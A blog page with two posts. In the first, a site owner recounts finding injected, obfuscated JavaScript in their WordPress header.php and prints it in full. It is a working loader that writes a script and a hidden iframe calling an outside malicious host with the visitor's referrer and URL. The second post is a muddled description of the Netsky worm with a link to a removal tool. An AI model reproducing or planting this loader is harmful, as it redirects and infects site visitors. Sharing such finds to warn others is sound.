Posts Tagged ‘virus’

I don’t the how it happen , but since last few days whenever I opened my site , my AVG would pop up warning about some malicious javascript . I never paid much attention to this , afterall they even detect harmless keygens as trojans too     . So I never took this seriously , hoping that everything will be fine in few days ( height of optimism ) .

But AVG kept on threatening me , and when my readers complained about this too , I got a little worried . I knew there was a javascript , and I know it was something related to a downloader agent . I knew where to start from . I google it straight away ( Bless google . Without you , we would be helpless ) . But mr. google failed as the only information I could gather that it was some phishing attack ( XSS , iframe ) but didn’t knew how to fix this problem .

Starting from scratch , I checked all my files for something “malicious” . And guess what I got . This bit of code was hiding in header.php .

s cript language=javascript><!– document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1′) // –></mce:script><br />

No idea where this thing came from . Lesson learnt : always take your antivirus seriously and a XSS / iframe attack even more seriously .

One of the most common viruses to affect your system . This virus
automatically creates a folder within folder with the same name as of parent folder . It appears again and again even if you delete it a thousand number of times .

More info about this virus

Name of the threat: W32.Netsky.P@mm
Command or file name: FVProtect.exe
Threat type: Spywaretrojan
Affected OS: Win32 (Windows 9x, Windows XP, Windows Vista)

Intrusion Method

This threat copies its file(s) to your hard disk. Its typical file name is W32.Netsky.P@mm. Then it creates new startup key with name W32.Netsky.P@mm and value FVProtect.exe. You can also find it in your processes list with name FVProtect.exe or W32.Netsky.P@mm.

Solution

Download program for FVProtect.exe removal (True Sword Threat Remover)

Courtesy : http://www.securitystronghold.com/